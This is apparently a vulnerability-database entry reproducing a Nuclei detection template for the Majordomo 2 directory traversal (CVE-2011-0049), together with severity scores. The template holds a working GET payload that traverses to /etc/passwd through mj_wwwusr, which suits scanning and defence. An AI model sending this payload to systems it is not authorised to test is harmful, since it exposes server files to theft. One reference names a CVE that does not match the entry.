Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2011-0049
HistoryApr 18, 2021 - 10:16 a.m.

Majordomo2 - SMTP/HTTP Directory Traversal

2021-04-1810:16:06
ProjectDiscovery
github.com
2

6.4 Medium

AI Score

Confidence

Low

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.881 High

EPSS

Percentile

98.6%

A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via … (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.

id: CVE-2011-0049

info:
  name: Majordomo2 - SMTP/HTTP Directory Traversal
  author: pikpikcu
  severity: medium
  description: A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive files and data on the server.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/16103
    - https://nvd.nist.gov/vuln/detail/CVE-2011-0063
    - http://www.kb.cert.org/vuls/id/363726
    - https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481
    - http://securityreason.com/securityalert/8061
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2011-0049
    cwe-id: CWE-22
    epss-score: 0.96615
    epss-percentile: 0.99548
    cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mj2
    product: majordomo_2
  tags: cve,cve2011,majordomo2,lfi,edb,mj2

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200847c0a8d121afe8c41b188ad79df89989aaa8406806a47fe74f2d39e80ff3f0022100de97a86b56c22a25c27f8f4e127d9529cb5d44d6e0cd37714be04e1ec1e30997:922c64590222798bb761d5b6d8e72950

6.4 Medium

AI Score

Confidence

Low

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.881 High

EPSS

Percentile

98.6%